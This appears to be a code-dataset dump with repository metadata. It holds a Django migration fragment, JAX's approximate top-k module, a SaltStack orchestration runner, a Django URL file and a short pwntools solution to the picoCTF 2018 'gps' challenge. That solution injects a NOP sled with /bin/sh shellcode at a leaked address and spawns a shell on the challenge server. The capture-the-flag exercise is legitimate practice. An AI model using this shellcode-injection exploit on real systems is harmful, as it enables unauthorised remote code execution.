'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '150', 'db_index': 'True'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['devrep.WorkType']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'devrep.worktypeprofile': {
'Meta': {'unique_together': "(('work_type', 'dev_profile'),)", 'object_name': 'WorkTypeProfile'},
'dev_profile': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.DevProfile']"}),
'experience': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Experience']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'measure': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Measure']"}),
'price_max': ('django.db.models.fields.IntegerField', [], {}),
'price_min': ('django.db.models.fields.IntegerField', [], {}),
'quality': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Quality']", 'null': 'True', 'blank': 'True'}),
'work_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.WorkType']"})
},
'estatebase.client': {
'Meta': {'ordering': "['-id']", 'object_name': 'Client'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'client_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.ClientType']", 'on_delete': 'models.PROTECT'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'dev_profile': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'client'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['devrep.DevProfile']", 'blank': 'True', 'unique': 'True'}),
'extra_profile': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'client'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['devrep.ExtraProfile']", 'blank': 'True', 'unique': 'True'}),
'has_dev_profile': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'history': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['estatebase.HistoryMeta']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'note': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'origin': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Origin']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'})
},
'estatebase.clienttype': {
'Meta': {'ordering': "['name']", 'object_name': 'ClientType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'estatebase.geogroup': {
'Meta': {'ordering': "['name']", 'object_name': 'GeoGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'estatebase.historymeta': {
'Meta': {'object_name': 'HistoryMeta'},
'created': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'creators'", 'on_delete': 'models.PROTECT', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modificated': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'updators'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['auth.User']"})
},
'estatebase.locality': {
'Meta': {'ordering': "['name']", 'unique_together': "(('name', 'region'),)", 'object_name': 'Locality'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'locality_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.LocalityType']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'name_gent': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'name_loct': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Region']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'})
},
'estatebase.localitytype': {
'Meta': {'ordering': "['name']", 'object_name': 'LocalityType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'prep_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'sort_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'estatebase.microdistrict': {
'Meta': {'ordering': "['name']", 'unique_together': "(('name', 'locality'),)", 'object_name': 'Microdistrict'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'locality': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Locality']", 'on_delete': 'models.PROTECT'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
},
'estatebase.origin': {
'Meta': {'ordering': "['name']", 'object_name': 'Origin'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'estatebase.region': {
'Meta': {'ordering': "['name']", 'object_name': 'Region'},
'geo_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.GeoGroup']", 'on_delete': 'models.PROTECT'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'metropolis': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'metropolis_region'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['estatebase.Locality']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'regular_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'regular_name_gent': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
'estatebase.street': {
'Meta': {'ordering': "['name']", 'unique_together': "(('name', 'locality', 'street_type'),)", 'object_name': 'Street'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'locality': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Locality']", 'on_delete': 'models.PROTECT'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'street_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.StreetType']", 'on_delete': 'models.PROTECT'})
},
'estatebase.streettype': {
'Meta': {'ordering': "['name']", 'object_name': 'StreetType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'sort_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
}
}
complete_apps = ['devrep'] | [
"[email protected]"
] | |
84df14f4e1fe0f3a3e47fb1ee4461567843140f3 | a79cccacfa422012caac481b5eff80f6e911d0af | /jax/_src/lax/ann.py | 35c91721882c89d307d21a50dd0f62583c81d5e7 | [
"Apache-2.0"
] | permissive | jblespiau/jax | f932fe6df23942756957db61655f6cc9c6d67d64 | 46a666c4489b9e04d2777cf2156453bc48a8e432 | refs/heads/main | 2022-04-17T01:50:55.041057 | 2022-04-15T08:49:52 | 2022-04-15T08:49:52 | 481,888,965 | 0 | 0 | Apache-2.0 | 2022-04-15T08:20:44 | 2022-04-15T08:20:43 | null | UTF-8 | Python | false | false | 16,155 | py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ANN (Approximate Nearest Neighbor) computes top-k with a configurable recall rate.
This package only optimizes the TPU backend. For other device types it falls
back to sort and slice.
Usage::
import functools
import jax
# MIPS := maximal inner product search
# Inputs:
# qy: f32[qy_size, feature_dim]
# db: f32[db_size, feature_dim]
#
# Returns:
# (f32[qy_size, k], i32[qy_size, k])
@functools.partial(jax.jit, static_argnames=["k", "recall_target"])
def mips(qy, db, k=10, recall_target=0.95):
dists = jax.lax.dot(qy, db.transpose())
# Computes max_k along the last dimension
# returns (f32[qy_size, k], i32[qy_size, k])
return jax.lax.approx_max_k(dists, k=k, recall_target=recall_target)
# Multi-core example
# Inputs:
# qy: f32[num_devices, qy_size, feature_dim]
# db: f32[num_devices, per_device_db_size, feature_dim]
# db_offset: i32[num_devices]
# db_size = num_devices * per_device_db_size
#
# Returns:
# (f32[qy_size, num_devices, k], i32[qy_size, num_devices, k])
@functools.partial(
jax.pmap,
# static args: db_size, k, recall_target
static_broadcasted_argnums=[3, 4, 5],
out_axes=(1, 1))
def pmap_mips(qy, db, db_offset, db_size, k, recall_target):
dists = jax.lax.dot(qy, db.transpose())
dists, neighbors = jax.lax.approx_max_k(
dists, k=k, recall_target=recall_target,
reduction_input_size_override=db_size)
return (dists, neighbors + db_offset)
# i32[qy_size, num_devices, k]
pmap_neighbors = pmap_mips(qy, db, db_offset, db_size, 10, 0.95)[1]
# i32[qy_size, num_devices * k]
neighbors = jax.lax.collapse(pmap_neighbors, start_dimension=1, stop_dimension=3)
Todos::
* On host top-k aggregation
* Inaccurate but fast differentiation
"""
from functools import partial
from typing import (Any, Tuple)
import numpy as np
from jax import core
from jax._src.lax import lax
from jax._src.lib import xla_client as xc
from jax._src import ad_util, dtypes
from jax.interpreters import ad, xla, batching
Array = Any
def approx_max_k(operand: Array,
k: int,
reduction_dimension: int = -1,
recall_target: float = 0.95,
reduction_input_size_override: int = -1,
aggregate_to_topk: bool = True) -> Tuple[Array, Array]:
"""Returns max ``k`` values and their indices of the ``operand`` in an approximate manner.
Args:
operand : Array to search for max-k. Must be a floating number type.
k : Specifies the number of max-k.
reduction_dimension : Integer dimension along which to search. Default: -1.
recall_target : Recall target for the approximation.
reduction_input_size_override : When set to a positive value, it overrides
the size determined by ``operand[reduction_dim]`` for evaluating the
recall. This option is useful when the given ``operand`` is only a subset
of the overall computation in SPMD or distributed pipelines, where the
      true input size cannot be inferred from the operand shape.
aggregate_to_topk : When true, aggregates approximate results to top-k. When
false, returns the approximate results. The number of the approximate
results is implementation defined and is greater equals to the specified
``k``.
Returns:
Tuple of two arrays. The arrays are the max ``k`` values and the
corresponding indices along the ``reduction_dimension`` of the input
``operand``. The arrays' dimensions are the same as the input ``operand``
except for the ``reduction_dimension``: when ``aggregate_to_topk`` is true,
the reduction dimension is ``k``; otherwise, it is greater equals to ``k``
where the size is implementation-defined.
We encourage users to wrap ``approx_max_k`` with jit. See the following
example for maximal inner production search (MIPS):
>>> import functools
>>> import jax
>>> import numpy as np
>>> @functools.partial(jax.jit, static_argnames=["k", "recall_target"])
... def mips(qy, db, k=10, recall_target=0.95):
... dists = jax.lax.dot(qy, db.transpose())
... # returns (f32[qy_size, k], i32[qy_size, k])
... return jax.lax.approx_max_k(dists, k=k, recall_target=recall_target)
>>>
>>> qy = jax.numpy.array(np.random.rand(50, 64))
>>> db = jax.numpy.array(np.random.rand(1024, 64))
>>> dot_products, neighbors = mips(qy, db, k=10)
"""
if xc._version < 45:
aggregate_to_topk = True
return approx_top_k_p.bind(
operand,
k=k,
reduction_dimension=reduction_dimension,
recall_target=recall_target,
is_max_k=True,
reduction_input_size_override=reduction_input_size_override,
aggregate_to_topk=aggregate_to_topk)
def approx_min_k(operand: Array,
k: int,
reduction_dimension: int = -1,
recall_target: float = 0.95,
reduction_input_size_override: int = -1,
aggregate_to_topk: bool = True) -> Tuple[Array, Array]:
"""Returns min ``k`` values and their indices of the ``operand`` in an approximate manner.
Args:
operand : Array to search for min-k. Must be a floating number type.
k : Specifies the number of min-k.
reduction_dimension: Integer dimension along which to search. Default: -1.
recall_target: Recall target for the approximation.
reduction_input_size_override : When set to a positive value, it overrides
the size determined by ``operand[reduction_dim]`` for evaluating the
recall. This option is useful when the given operand is only a subset of
the overall computation in SPMD or distributed pipelines, where the true
      input size cannot be inferred from the ``operand`` shape.
aggregate_to_topk: When true, aggregates approximate results to top-k. When
false, returns the approximate results. The number of the approximate
results is implementation defined and is greater equals to the specified
``k``.
Returns:
Tuple of two arrays. The arrays are the least ``k`` values and the
corresponding indices along the ``reduction_dimension`` of the input
``operand``. The arrays' dimensions are the same as the input ``operand``
except for the ``reduction_dimension``: when ``aggregate_to_topk`` is true,
the reduction dimension is ``k``; otherwise, it is greater equals to ``k``
where the size is implementation-defined.
We encourage users to wrap ``approx_min_k`` with jit. See the following example
for nearest neighbor search over the squared l2 distance:
>>> import functools
>>> import jax
>>> import numpy as np
>>> @functools.partial(jax.jit, static_argnames=["k", "recall_target"])
... def l2_ann(qy, db, half_db_norms, k=10, recall_target=0.95):
... dists = half_db_norms - jax.lax.dot(qy, db.transpose())
... return jax.lax.approx_min_k(dists, k=k, recall_target=recall_target)
>>>
>>> qy = jax.numpy.array(np.random.rand(50, 64))
>>> db = jax.numpy.array(np.random.rand(1024, 64))
>>> half_db_norms = jax.numpy.linalg.norm(db, axis=1) / 2
>>> dists, neighbors = l2_ann(qy, db, half_db_norms, k=10)
  In the example above, we compute ``db_norms/2 - dot(qy, db^T)`` instead of
  ``qy^2 - 2 dot(qy, db^T) + db^2`` for performance reasons. The former uses
  less arithmetic and produces the same set of neighbors.
"""
if xc._version < 45:
aggregate_to_topk = True
return approx_top_k_p.bind(
operand,
k=k,
reduction_dimension=reduction_dimension,
recall_target=recall_target,
is_max_k=False,
reduction_input_size_override=reduction_input_size_override,
aggregate_to_topk=aggregate_to_topk)
def _approx_top_k_abstract_eval(operand, *, k, reduction_dimension,
recall_target, is_max_k,
reduction_input_size_override,
aggregate_to_topk):
if k <= 0:
raise ValueError('k must be positive, got {}'.format(k))
if len(operand.shape) == 0:
raise TypeError('approx_top_k operand must have >= 1 dimension, got {}'.format(
operand.shape))
dims = list(operand.shape)
if dims[reduction_dimension] < k:
raise ValueError(
'k must be smaller than the size of reduction_dim {}, got {}'.format(
dims[reduction_dimension], k))
if not dtypes.issubdtype(operand.dtype, np.floating):
raise ValueError('operand must be a floating type')
if xc._version >= 45:
reduction_input_size = dims[reduction_dimension]
dims[reduction_dimension] = xc.ops.ApproxTopKReductionOutputSize(
reduction_input_size, len(dims), k, recall_target, aggregate_to_topk,
reduction_input_size_override)[0]
else:
dims[reduction_dimension] = k
return (operand.update(
shape=dims, dtype=operand.dtype, weak_type=operand.weak_type),
operand.update(shape=dims, dtype=np.dtype(np.int32)))
def _comparator_builder(op_type, is_max_k):
c = xc.XlaBuilder(
'top_k_{}_comparator'.format('gt' if is_max_k else 'lt'))
p0 = xla.parameter(c, 0, xc.Shape.scalar_shape(op_type))
p1 = xla.parameter(c, 1, xc.Shape.scalar_shape(op_type))
xla.parameter(c, 2, xc.Shape.scalar_shape(np.dtype(np.int32)))
xla.parameter(c, 3, xc.Shape.scalar_shape(np.dtype(np.int32)))
if is_max_k:
cmp_result = xc.ops.Gt(p0, p1)
else:
cmp_result = xc.ops.Lt(p0, p1)
return c.build(cmp_result)
def _get_init_val_literal(op_type, is_max_k):
return np.array(np.NINF if is_max_k else np.Inf, dtype=op_type)
def _approx_top_k_tpu_translation(ctx, avals_in, avals_out, operand, *, k,
reduction_dimension, recall_target, is_max_k,
reduction_input_size_override,
aggregate_to_topk):
c = ctx.builder
op_shape = c.get_shape(operand)
if not op_shape.is_array():
raise ValueError('operand must be an array, but was {}'.format(op_shape))
op_dims = op_shape.dimensions()
op_type = op_shape.element_type()
if reduction_dimension < 0:
reduction_dimension = len(op_dims) + reduction_dimension
comparator = _comparator_builder(op_type, is_max_k)
init_val_literal = _get_init_val_literal(op_type, is_max_k)
iota = xc.ops.Iota(c, xc.Shape.array_shape(np.dtype(np.int32), op_dims),
reduction_dimension)
init_val = xc.ops.Constant(c, init_val_literal)
init_arg = xc.ops.Constant(c, np.int32(-1))
out = xc.ops.ApproxTopK(c, [operand, iota], [init_val, init_arg], k,
reduction_dimension, comparator, recall_target,
aggregate_to_topk, reduction_input_size_override)
return xla.xla_destructure(c, out)
def _approx_top_k_fallback_translation(ctx, avals_in, avals_out, operand, *, k,
reduction_dimension, recall_target,
is_max_k, reduction_input_size_override,
aggregate_to_topk):
c = ctx.builder
op_shape = c.get_shape(operand)
if not op_shape.is_array():
raise ValueError('operand must be an array, but was {}'.format(op_shape))
op_dims = op_shape.dimensions()
op_type = op_shape.element_type()
if reduction_dimension < 0:
reduction_dimension = len(op_dims) + reduction_dimension
comparator = _comparator_builder(op_type, is_max_k)
iota = xc.ops.Iota(c, xc.Shape.array_shape(np.dtype(np.int32), op_dims),
reduction_dimension)
if xc._version >= 60:
init_val_literal = _get_init_val_literal(op_type, is_max_k)
init_val = xc.ops.Constant(c, init_val_literal)
init_arg = xc.ops.Constant(c, np.int32(-1))
out = xc.ops.ApproxTopKFallback(c, [operand, iota], [init_val, init_arg], k,
reduction_dimension, comparator,
recall_target, aggregate_to_topk,
reduction_input_size_override)
return xla.xla_destructure(c, out)
else:
val_arg = xc.ops.Sort(c, [operand, iota], comparator, reduction_dimension)
vals = xc.ops.GetTupleElement(val_arg, 0)
args = xc.ops.GetTupleElement(val_arg, 1)
sliced_vals = xc.ops.SliceInDim(vals, 0,
avals_out[0].shape[reduction_dimension], 1,
reduction_dimension)
sliced_args = xc.ops.SliceInDim(args, 0,
avals_out[0].shape[reduction_dimension], 1,
reduction_dimension)
return sliced_vals, sliced_args
def _approx_top_k_batch_rule(batch_operands, batch_axes, *, k,
reduction_dimension, recall_target, is_max_k,
reduction_input_size_override, aggregate_to_topk):
assert len(batch_operands) == 1
assert len(batch_axes) == 1
operand, = batch_operands
batch_axis, = batch_axes
dim_map = [d for d in range(operand.ndim) if d is not batch_axis]
reduction_dimension = dim_map[reduction_dimension]
return approx_top_k_p.bind(
operand,
k=k,
reduction_dimension=reduction_dimension,
recall_target=recall_target,
is_max_k=is_max_k,
reduction_input_size_override=reduction_input_size_override,
aggregate_to_topk=aggregate_to_topk), (batch_axis, batch_axis)
# Slow jvp implementation using gather.
#
# TODO(fchern): Some optimization ideas
# 1. ApproxTopK is internally a variadic reduce, so we can simply call
# ApproxTopK(operand, tangent, iota) for jvp.
# 2. vjp cannot benefit from the algorithm above. We must run scatter to
# distribute the output cotangent to input cotangent. A reasonable way to do
# this is to run it on CPU.
def _approx_top_k_jvp(primals, tangents, *, k, reduction_dimension,
recall_target, is_max_k, reduction_input_size_override,
aggregate_to_topk):
operand, = primals
tangent, = tangents
if is_max_k:
val_out, arg_out = approx_max_k(operand, k, reduction_dimension,
recall_target,
reduction_input_size_override,
aggregate_to_topk)
else:
val_out, arg_out = approx_min_k(operand, k, reduction_dimension,
recall_target,
reduction_input_size_override,
aggregate_to_topk)
if type(tangent) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(val_out)
else:
arg_shape = arg_out.shape
rank = len(arg_shape)
if reduction_dimension < 0:
reduction_dimension += rank
iotas = [
lax.broadcasted_iota(arg_out.dtype, arg_shape, i) for i in range(rank)
]
idx = tuple(
arg_out if i == reduction_dimension else iotas[i] for i in range(rank))
tangent_out = tangent[idx]
return (val_out, arg_out), (tangent_out, ad_util.Zero.from_value(arg_out))
approx_top_k_p = core.Primitive('approx_top_k')
approx_top_k_p.multiple_results = True
approx_top_k_p.def_impl(partial(xla.apply_primitive, approx_top_k_p))
approx_top_k_p.def_abstract_eval(_approx_top_k_abstract_eval)
xla.register_translation(approx_top_k_p, _approx_top_k_fallback_translation)
xla.register_translation(approx_top_k_p, _approx_top_k_tpu_translation,
platform='tpu')
batching.primitive_batchers[approx_top_k_p] = _approx_top_k_batch_rule
ad.primitive_jvps[approx_top_k_p] = _approx_top_k_jvp
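# Illustrative composition sketch (not part of the module API; the shapes and
# names below are assumptions): because a batching rule and a JVP are
# registered above, ``approx_max_k`` composes with ``jax.vmap``:
#
#   import functools
#   import jax
#   import jax.numpy as jnp
#
#   scores = jnp.ones((8, 1024))                        # hypothetical batch of score rows
#   top10 = functools.partial(jax.lax.approx_max_k, k=10)
#   vals, idx = jax.vmap(top10)(scores)                 # both results have shape (8, 10)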
| [
"[email protected]"
] | |
b8d68d8d894d6c17419300003a7d20d74344d72a | c9a809c5ef2a6b5e7e50da548c182510d203f430 | /salt/runners/state.py | c518e3a0d78bbbd446286c27c563e844fd7152c4 | [
"Apache-2.0"
] | permissive | andyyumiao/saltx | 676a44c075ce06d5ac62fc13de6dcd750b3d0d74 | a05c22a60706b5c4389adbd77581b5cf985763b5 | refs/heads/master | 2022-02-24T00:51:42.420453 | 2022-02-09T06:46:40 | 2022-02-09T06:46:40 | 231,860,568 | 1 | 5 | NOASSERTION | 2022-02-09T06:46:40 | 2020-01-05T03:10:15 | Python | UTF-8 | Python | false | false | 7,000 | py | # -*- coding: utf-8 -*-
'''
Execute orchestration functions
'''
# Import python libs
from __future__ import absolute_import, print_function
import logging
# Import salt libs
import salt.loader
import salt.utils
import salt.utils.event
from salt.exceptions import SaltInvocationError
LOGGER = logging.getLogger(__name__)
def orchestrate(mods,
saltenv='base',
test=None,
exclude=None,
pillar=None,
pillarenv=None,
pillar_enc=None,
orchestration_jid=None):
'''
.. versionadded:: 0.17.0
Execute a state run from the master, used as a powerful orchestration
system.
.. seealso:: More Orchestrate documentation
* :ref:`Full Orchestrate Tutorial <orchestrate-runner>`
* :py:mod:`Docs for the master-side state module <salt.states.saltmod>`
CLI Examples:
.. code-block:: bash
salt-run state.orchestrate webserver
salt-run state.orchestrate webserver saltenv=dev test=True
salt-run state.orchestrate webserver saltenv=dev pillarenv=aws
.. versionchanged:: 2014.1.1
Runner renamed from ``state.sls`` to ``state.orchestrate``
.. versionchanged:: 2014.7.0
Runner uses the pillar variable
.. versionchanged:: develop
Runner uses the pillar_enc variable that allows renderers to render the pillar.
This is usable when supplying the contents of a file as pillar, and the file contains
gpg-encrypted entries.
.. seealso:: GPG renderer documentation
CLI Examples:
.. code-block:: bash
salt-run state.orchestrate webserver pillar_enc=gpg pillar="$(cat somefile.json)"
'''
if pillar is not None and not isinstance(pillar, dict):
raise SaltInvocationError(
'Pillar data must be formatted as a dictionary'
)
__opts__['file_client'] = 'local'
minion = salt.minion.MasterMinion(__opts__)
if pillarenv is None and 'pillarenv' in __opts__:
pillarenv = __opts__['pillarenv']
if saltenv is None and 'saltenv' in __opts__:
saltenv = __opts__['saltenv']
running = minion.functions['state.sls'](
mods,
test,
exclude,
pillar=pillar,
saltenv=saltenv,
pillarenv=pillarenv,
pillar_enc=pillar_enc,
__pub_jid=orchestration_jid,
orchestration_jid=orchestration_jid)
ret = {'data': {minion.opts['id']: running}, 'outputter': 'highstate'}
res = salt.utils.check_state_result(ret['data'])
if res:
ret['retcode'] = 0
else:
ret['retcode'] = 1
return ret
# Aliases for orchestrate runner
orch = salt.utils.alias_function(orchestrate, 'orch')
sls = salt.utils.alias_function(orchestrate, 'sls')
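# With the aliases above, `salt-run state.orch webserver` and
# `salt-run state.sls webserver` behave the same as
# `salt-run state.orchestrate webserver`.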
def orchestrate_single(fun, name, test=None, queue=False, pillar=None, **kwargs):
'''
Execute a single state orchestration routine
.. versionadded:: 2015.5.0
CLI Example:
.. code-block:: bash
salt-run state.orchestrate_single fun=salt.wheel name=key.list_all
'''
if pillar is not None and not isinstance(pillar, dict):
raise SaltInvocationError(
'Pillar data must be formatted as a dictionary'
)
__opts__['file_client'] = 'local'
minion = salt.minion.MasterMinion(__opts__)
running = minion.functions['state.single'](
fun,
name,
test=None,
queue=False,
pillar=pillar,
**kwargs)
ret = {minion.opts['id']: running}
__jid_event__.fire_event({'data': ret, 'outputter': 'highstate'}, 'progress')
return ret
def orchestrate_high(data, test=None, queue=False, pillar=None, **kwargs):
'''
Execute a single state orchestration routine
.. versionadded:: 2015.5.0
CLI Example:
.. code-block:: bash
salt-run state.orchestrate_high '{
stage_one:
{salt.state: [{tgt: "db*"}, {sls: postgres_setup}]},
stage_two:
{salt.state: [{tgt: "web*"}, {sls: apache_setup}, {
require: [{salt: stage_one}],
}]},
}'
'''
if pillar is not None and not isinstance(pillar, dict):
raise SaltInvocationError(
'Pillar data must be formatted as a dictionary'
)
__opts__['file_client'] = 'local'
minion = salt.minion.MasterMinion(__opts__)
running = minion.functions['state.high'](
data,
test=None,
queue=False,
pillar=pillar,
**kwargs)
ret = {minion.opts['id']: running}
__jid_event__.fire_event({'data': ret, 'outputter': 'highstate'}, 'progress')
return ret
def event(tagmatch='*',
count=-1,
quiet=False,
sock_dir=None,
pretty=False,
node='master'):
r'''
Watch Salt's event bus and block until the given tag is matched
.. versionadded:: 2014.7.0
This is useful for utilizing Salt's event bus from shell scripts or for
taking simple actions directly from the CLI.
Enable debug logging to see ignored events.
:param tagmatch: the event is written to stdout for each tag that matches
this pattern; uses the same matching semantics as Salt's Reactor.
:param count: this number is decremented for each event that matches the
``tagmatch`` parameter; pass ``-1`` to listen forever.
:param quiet: do not print to stdout; just block
:param sock_dir: path to the Salt master's event socket file.
:param pretty: Output the JSON all on a single line if ``False`` (useful
for shell tools); pretty-print the JSON output if ``True``.
:param node: Watch the minion-side or master-side event bus.
.. versionadded:: 2016.3.0
CLI Examples:
.. code-block:: bash
# Reboot a minion and run highstate when it comes back online
salt 'jerry' system.reboot && \\
salt-run state.event 'salt/minion/jerry/start' count=1 quiet=True && \\
salt 'jerry' state.highstate
# Reboot multiple minions and run highstate when all are back online
salt -L 'kevin,stewart,dave' system.reboot && \\
salt-run state.event 'salt/minion/*/start' count=3 quiet=True && \\
salt -L 'kevin,stewart,dave' state.highstate
# Watch the event bus forever in a shell while-loop.
salt-run state.event | while read -r tag data; do
echo $tag
echo $data | jq --color-output .
done
.. seealso::
See :blob:`tests/eventlisten.sh` for an example of usage within a shell
script.
'''
statemod = salt.loader.raw_mod(__opts__, 'state', None)
return statemod['state.event'](
tagmatch=tagmatch,
count=count,
quiet=quiet,
sock_dir=sock_dir,
pretty=pretty,
node=node)
| [
"[email protected]"
] | |
8f1eca7502fed553159d86ab0a9a9fc3b4e6cc4e | 830465731dfda87b4141546262f20d74c29297bf | /PWN/picoCTF2018/gps/sol.py | 30b5d3d95371c78ea26ca454d6de1719db8ff1e5 | [] | no_license | jchen8tw-research/CTF | f559d7ca0e16a730335b11caeeae208c42e8bf17 | f49615c24437a9cc6a2c20d6b30cb5abf7a32b71 | refs/heads/master | 2023-03-17T12:29:08.630613 | 2021-03-23T06:31:26 | 2021-03-23T06:31:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 591 | py | #coding=utf-8
from pwn import *
import re
#context.log_level = 'debug'
#context(arch='amd64', os='linux', bits = '64')
context.binary = './gps'
debug = 0
if not debug:
r = remote('2018shell.picoctf.com', 49351)
else:
r = process('./gps')
nop = asm(shellcraft.nop())
shell = asm(shellcraft.sh())
#shell = asm(pwnlib.shellcraft.amd64.linux.sh())
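# The payload below is a NOP sled: roughly 0x1000 bytes of NOPs followed by the
# shellcode, so the jump target sent later (the leaked address plus 2000) only
# has to land somewhere inside the sled before the shellcode.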
payload = nop * (0x1000 - len(shell) - 3) + shell
addr = int(r.recvuntil('> ').split('\n')[9].split(': ')[1][2:], 16)
addr += 2000
log.info('addr: {}'.format(addr))
r.sendline(payload)
r.sendlineafter('> ', hex(addr)[2:])
r.interactive()
| [
"[email protected]"
] | |
7d06158920b29367d17b448de2179236f193de27 | b19c9fe62eaa309851dc11f6fd7a05bda463fb58 | /bigfish/apps/reports/urls.py | 5e6efab43043385bd460b9f0af28d1b83c72092f | [] | no_license | hyu9999/bigfish | 3ff3b025982e71bd6dd80f60ad6c70e735e98936 | 4189fdcacc20795a4778b53c9d47d6fdd3e71811 | refs/heads/master | 2022-07-08T13:55:12.908583 | 2019-03-22T09:36:12 | 2019-03-22T09:36:12 | 177,055,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | from django.conf.urls import url
from rest_framework import routers
router = routers.SimpleRouter()
# router.register(r'studies/enters', EnterStudyViewSet)
# router.register(r'studies/conversations', ConversationViewSet)
# router.register(r'studies/savedatainfo', SaveDataInfoViews)
# router.register(r'studies/savedatadetails', SaveDataDetailsViews)
# router.register(r'studies/examinationreport', ExaminationReportViewSet)
# router.register(r'studies/ratingreport', RatingReportViewSet)
# router.register(r'studies/practical_course_record', PracticalCourseRecordViewSet)
# router.register(r'studies/request_exception', RequestExceptionViewSet)
urlpatterns = router.urls
| [
"[email protected]"
] | |
